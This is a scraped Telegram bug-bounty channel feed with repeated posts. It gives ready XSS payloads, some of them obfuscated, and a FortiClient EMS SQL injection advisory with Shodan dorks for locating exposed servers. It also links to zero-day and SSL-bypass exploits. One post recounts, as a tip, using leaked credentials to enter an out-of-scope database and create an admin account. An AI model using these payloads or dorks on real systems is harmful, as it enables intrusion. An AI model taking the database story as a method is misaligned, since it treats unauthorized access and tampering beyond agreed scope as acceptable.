Hey Hunter’s,
DarkShadow is here back again!
"if SSRF is not works in image url parameter then try XSS"
in image parameter you can use these type of payloads:
Now guy’s show you love🔥
#bugbountytips #xss
DarkShadow is here back again!
"if SSRF is not works in image url parameter then try XSS"
in image parameter you can use these type of payloads:
<svg/onload=eval(atob(‘YWxlcnQoJ1hTUycp’))>
<svg onload=eval(http://window.name)>
"><svg onload=prompt(document.domain);>.png
嘼svg><script>a<!>l<!>e<!>r<!>t<!>(<!>1<!>)</script>
Now guy’s show you love🔥
#bugbountytips #xss
❤8🔥5👍1
🚨 Bug Bounty / Red Team Tip
CVE-2026-21643 — Critical Pre-Auth SQL Injection (CVSS 9.1) in FortiClient EMS 7.4.4 (multi-tenant mode only)
Unauthenticated attackers can inject arbitrary SQL via the Site HTTP header to the public endpoint
- Affected: Only FortiClient EMS 7.4.4 (multi-tenant/Sites feature enabled)
- Not affected: 7.2.x, 8.0.x, single-site deployments
- Fixed: Upgrade to 7.4.5 or later
- Status: Actively exploited in the wild + public PoCs available
Main Detail Article (Highly Recommended):
Bishop Fox deep-dive with exploitation paths, payloads (e.g.,
https://bishopfox.com/blog/cve-2026-21643-pre-authentication-sql-injection-in-forticlient-ems-7-4-4
Public PoC (GitHub):
https://github.com/0xBlackash/CVE-2026-21643
Useful Google/Shodan Dorks:
-
-
-
- Shodan:
Quick Check:
If your EMS login page is internet-facing and running 7.4.4 with multi-tenant enabled → patch ASAP or block public access. Thousands of instances are exposed (Shadowserver ~2k+, Shodan ~1k+).
High-value target for hunters. Patch or restrict immediately!
#BugBounty #RedTeam #Fortinet #CVE202621643 #SQLi
CVE-2026-21643 — Critical Pre-Auth SQL Injection (CVSS 9.1) in FortiClient EMS 7.4.4 (multi-tenant mode only)
Unauthenticated attackers can inject arbitrary SQL via the Site HTTP header to the public endpoint
/api/v1/init_consts (or login endpoint). This happens before authentication and hits the PostgreSQL backend with superuser-level access in many setups → full DB dump, schema extraction, or RCE (via PostgreSQL features like COPY FROM PROGRAM).- Affected: Only FortiClient EMS 7.4.4 (multi-tenant/Sites feature enabled)
- Not affected: 7.2.x, 8.0.x, single-site deployments
- Fixed: Upgrade to 7.4.5 or later
- Status: Actively exploited in the wild + public PoCs available
Main Detail Article (Highly Recommended):
Bishop Fox deep-dive with exploitation paths, payloads (e.g.,
pg_sleep(5) for blind testing), and lab results → https://bishopfox.com/blog/cve-2026-21643-pre-authentication-sql-injection-in-forticlient-ems-7-4-4
Public PoC (GitHub):
https://github.com/0xBlackash/CVE-2026-21643
Useful Google/Shodan Dorks:
-
http.title:"FortiClient EMS" "7.4.4"-
http.html:"FortiClient Enterprise Management Server"-
http.favicon.hash: -specific-hash (or search for EMS login page)- Shodan:
"Model: FCTEMS" or "FortiClient EMS"Quick Check:
If your EMS login page is internet-facing and running 7.4.4 with multi-tenant enabled → patch ASAP or block public access. Thousands of instances are exposed (Shadowserver ~2k+, Shodan ~1k+).
High-value target for hunters. Patch or restrict immediately!
#BugBounty #RedTeam #Fortinet #CVE202621643 #SQLi
❤12👍4🔥4
Please don’t forget to react to the post and share it. Your reactions motivate us to post more content like this. You can also tap the ⭐️ to show your support. Thanks!😋 😋 😋
Please open Telegram to view this post
VIEW IN TELEGRAM
5❤12
Hey Hunters,
DarkShadow here back again!
out-of-scope target can lead to an in-scope critical vulnerability!
The story starts from a normal endpoint. When I clicked it, it redirected me somewhere else, and after resolving something, it returned the content. To check further what’s going on, I opened the request in Burp Suite. The endpoint performed a 302 redirect to an external domain, which was out of scope.
But here’s the twist—it was still showing the content from the original website I had requested. So I thought, maybe it’s working like a proxy?
Here comes the real mastery. Most bug hunters ignore this kind of behavior, but I decided to dig deeper. And yeah, I found a file: backup.zip
I instantly unzipped it and noticed a config/ folder, and inside it—a config.php file.
Guess what?
I found MySQL database credentials, and the most interesting part? The database URL was publicly accessible—not just localhost!
I tried connecting… and boom! I was successfully connected.
But wait—this domain is out of scope, right?
That’s what I thought too… until I started reading there massive database and was shocked—
It was the target's database, exposed through their proxy server, which had the hardcoded credentials in the config file.
At that moment, I was really excited.
Then I thought: What if I create a new user with admin role?
So I did exactly that—added an admin user to the database.
Now, on the target website, there’s a normal login page (not labeled as admin login), but I tried logging in with the new credentials and guess what?
BOOM! 💥
It logged me into the admin dashboard.
And just like that, I turned an out-of-scope target into a critical in-scope auth bypass vulnerability.✅
So guys, if you enjoyed this method, don’t forget to show some love—and please, pray for me, I’m really sick right now.
And don’t forget to follow me on X (Twitter): x.com/Darkshadow2bd
#bugbountytips #infosec
DarkShadow here back again!
out-of-scope target can lead to an in-scope critical vulnerability!
The story starts from a normal endpoint. When I clicked it, it redirected me somewhere else, and after resolving something, it returned the content. To check further what’s going on, I opened the request in Burp Suite. The endpoint performed a 302 redirect to an external domain, which was out of scope.
But here’s the twist—it was still showing the content from the original website I had requested. So I thought, maybe it’s working like a proxy?
Here comes the real mastery. Most bug hunters ignore this kind of behavior, but I decided to dig deeper. And yeah, I found a file: backup.zip
I instantly unzipped it and noticed a config/ folder, and inside it—a config.php file.
Guess what?
I found MySQL database credentials, and the most interesting part? The database URL was publicly accessible—not just localhost!
I tried connecting… and boom! I was successfully connected.
But wait—this domain is out of scope, right?
That’s what I thought too… until I started reading there massive database and was shocked—
It was the target's database, exposed through their proxy server, which had the hardcoded credentials in the config file.
At that moment, I was really excited.
Then I thought: What if I create a new user with admin role?
So I did exactly that—added an admin user to the database.
Now, on the target website, there’s a normal login page (not labeled as admin login), but I tried logging in with the new credentials and guess what?
BOOM! 💥
It logged me into the admin dashboard.
And just like that, I turned an out-of-scope target into a critical in-scope auth bypass vulnerability.✅
So guys, if you enjoyed this method, don’t forget to show some love—and please, pray for me, I’m really sick right now.
And don’t forget to follow me on X (Twitter): x.com/Darkshadow2bd
#bugbountytips #infosec
X (formerly Twitter)
DarkShadow (@darkshadow2bd) on X
Ethical Hacker | Penetration Tester | Security Researcher | Bug Hunter | Exploit Developer.
🔥~For more Join my New telegram Channel👉🏼 https://t.co/9p1yvzluA4 ✨
🔥~For more Join my New telegram Channel👉🏼 https://t.co/9p1yvzluA4 ✨
❤7👍2
Please open Telegram to view this post
VIEW IN TELEGRAM
❤5
🔥 XSSnow — Advanced XSS Payload Generator & Testing Platform
⚔️ Dynamic XSS Payload Generation for Web Security Testing
📌 GitHub Repository
👉 https://github.com/dr34mhacks/xssnow
📌 Live Payload Platform
👉 https://xssnow.in/payloads.html
⚔️ Dynamic XSS Payload Generation for Web Security Testing
📌 GitHub Repository
👉 https://github.com/dr34mhacks/xssnow
📌 Live Payload Platform
👉 https://xssnow.in/payloads.html
❤9
🚀 Snapchat SSL Bypass (2026) is now available — arm64-v8a only
I’ve just released my custom Frida SSL bypass script for the Snapchat Android application, fully updated to support the latest 2026 versions.
✅ Supported architecture: arm64-v8a only
Built and tested by me from scratch to support mobile security research, traffic inspection, and dynamic application analysis.
🔗 Frida CodeShare: https://codeshare.frida.re/@mr-blackhole/snapchat-ssl-bypass-all-new-version-of-2026/
Credit @shaho_it
I’ve just released my custom Frida SSL bypass script for the Snapchat Android application, fully updated to support the latest 2026 versions.
✅ Supported architecture: arm64-v8a only
Built and tested by me from scratch to support mobile security research, traffic inspection, and dynamic application analysis.
🔗 Frida CodeShare: https://codeshare.frida.re/@mr-blackhole/snapchat-ssl-bypass-all-new-version-of-2026/
Credit @shaho_it
❤13
🚨Payment Bypass Bug Lab - Master Payment Exploits Easily.
Lab 01: Price Modification
Lab 02: Direct Path Access
Lab 03: Permission Bypass
✅https://github.com/ItsRishika/Payment-bypass-bug-lab
Lab 01: Price Modification
Lab 02: Direct Path Access
Lab 03: Permission Bypass
✅https://github.com/ItsRishika/Payment-bypass-bug-lab
🗿2
🕸️𝗢𝗦𝗘𝗗 𝗡𝗼𝘁𝗲𝘀:
(𝗢𝗳𝗳𝗲𝗻𝘀𝗶𝘃𝗲 𝗦𝗲𝗰𝘂𝗿𝗶𝘁𝘆 𝗘𝘅𝗽𝗹𝗼𝗶𝘁 𝗗𝗲𝘃𝗲𝗹𝗼𝗽𝗲𝗿)
📋List:
•x86 Intel Assembly
•Portable Executable File Format
•WinDBG
•WinDbg Automation with Python
•IDA
•Stack Overflows
•SEH Overflows
•EggHunters
•Reverse Engineering For Bugs
•DEP Bypass
•ASLR Bypass
•Format Strings Vulnerabilities
•Practicing
Link 🔗:-
https://zeyadazima.com/notes/osednotes/
🔖#infosec #cybersecurity #hacking #pentesting #security
(𝗢𝗳𝗳𝗲𝗻𝘀𝗶𝘃𝗲 𝗦𝗲𝗰𝘂𝗿𝗶𝘁𝘆 𝗘𝘅𝗽𝗹𝗼𝗶𝘁 𝗗𝗲𝘃𝗲𝗹𝗼𝗽𝗲𝗿)
📋List:
•x86 Intel Assembly
•Portable Executable File Format
•WinDBG
•WinDbg Automation with Python
•IDA
•Stack Overflows
•SEH Overflows
•EggHunters
•Reverse Engineering For Bugs
•DEP Bypass
•ASLR Bypass
•Format Strings Vulnerabilities
•Practicing
Link 🔗:-
https://zeyadazima.com/notes/osednotes/
🔖#infosec #cybersecurity #hacking #pentesting #security
1🔥17❤5👍2
Please open Telegram to view this post
VIEW IN TELEGRAM
❤9
🔥 BlueHammer — Windows Defender 0-Day Privilege Escalation PoC
⚔️ Unpatched Windows Zero-Day Exploit (SYSTEM Access)
📌 GitHub Repository
👉 https://github.com/Nightmare-Eclipse/BlueHammer
⚔️ Unpatched Windows Zero-Day Exploit (SYSTEM Access)
📌 GitHub Repository
👉 https://github.com/Nightmare-Eclipse/BlueHammer
❤7👍1
Brut Security
10 Free Coupons - https://topmate.io/saumadip/2009859?coupon_code=awxe
New Contents will be added every month without any extra cost
🔴 LIVE CLASS ALERT — Don't scroll past this.
💻 Brut Security is launching a Practical Web Pentesting Live Class — and seats are limited.
🗓️ Starts: May 4
🎯 Mode: Online (Live)
──────────────────
🛠️ What you'll learn:
• SQL Injection, XSS, IDOR, SSRF
• Authentication & Access Control Bypass
• CSRF, File Upload Attacks
• Burp Suite from scratch
• Recon, API Hacking & Reporting
──────────────────
This isn't a pre-recorded course. This is LIVE — ask questions, break things in real time, and learn the way actual pentesters do.
✅ Beginner friendly
✅ Hands-on labs
✅ Certificate on completion
🔗 Enroll now → http://wa.link/brutsecurity
⚡ Spots fill fast. Don't wait.
#BrutSecurity #WebPentesting #EthicalHacking #BugBounty #Cybersecurity #LiveClass
💻 Brut Security is launching a Practical Web Pentesting Live Class — and seats are limited.
🗓️ Starts: May 4
🎯 Mode: Online (Live)
──────────────────
🛠️ What you'll learn:
• SQL Injection, XSS, IDOR, SSRF
• Authentication & Access Control Bypass
• CSRF, File Upload Attacks
• Burp Suite from scratch
• Recon, API Hacking & Reporting
──────────────────
This isn't a pre-recorded course. This is LIVE — ask questions, break things in real time, and learn the way actual pentesters do.
✅ Beginner friendly
✅ Hands-on labs
✅ Certificate on completion
🔗 Enroll now → http://wa.link/brutsecurity
⚡ Spots fill fast. Don't wait.
#BrutSecurity #WebPentesting #EthicalHacking #BugBounty #Cybersecurity #LiveClass
❤4
🚨 CVE-2026-23898 & CVE-2026-23899: Critical File Deletion and Webservice Flaws Exposed in Joomla.
👇Dorks
HUNTER : http://product.name="Joomla"
👇Dorks
HUNTER : http://product.name="Joomla"
❤4